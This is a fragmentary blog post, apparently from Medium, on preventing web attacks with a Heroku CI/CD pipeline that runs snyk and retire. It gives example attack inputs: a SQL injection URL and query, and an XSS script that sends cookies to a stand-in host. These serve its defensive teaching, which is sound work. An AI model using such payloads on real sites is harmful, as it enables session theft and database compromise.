Using Your CI/CD Pipeline To Prevent Your App From Getting Hacked

How Hackers Attack

Injection attacks

https://somewebsite.com/customers?region=South'+OR+1=1--
SELECT * FROM products WHERE category = ‘Gifts’ OR 1=1 — ‘ AND released = 1

Broken authentication

Sensitive data leaks

XML external entities

Broken access control

https://newapp.com/site/get-info
http://newapp.com/site/admin/get-info

Security misconfiguration

Cross-site scripting

<script>
window.location=”http://wrongsite.com/?cookie=" + document.cookie
</script>

Insecure deserialization

Using packages with known vulnerabilities

Not enough logging and monitoring

How to Prevent Attacks Using Your CI/CD Pipeline

{
"buildpacks": [
{
"url": "heroku/nodejs"
}
],
"environments": {
"test": {
"scripts": {
"test-setup": "npm install -g snyk retire",
"test": "snyk auth $SNYK_TOKEN && snyk test && retire && npm test"
}
}
}
}
Heroku Flow view
Tests running in Heroku CI

Build

Test

Delivery

Other Considerations

  • Optimize your build time to make deploys to production happen quickly. This means keeping a small build size and only using the tools you need.
  • Keep parity across all of your environments. This will help with testing; when developers and QA are testing against staging or other environments, it’s most useful when they are as close to production as possible.
  • Don’t check secrets and credentials into version control. Make sure all PRs go through some kind of review/test to check for this. It’s more difficult to get these out once they’ve been merged in.
  • Make the pipeline the only way to deploy changes to production so that you always know when code changes are released.

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Milecia

Milecia

Starting classes soon! | Software/Hardware Engineer | International tech speaker | Random inventor and slightly mad scientist with extra sauce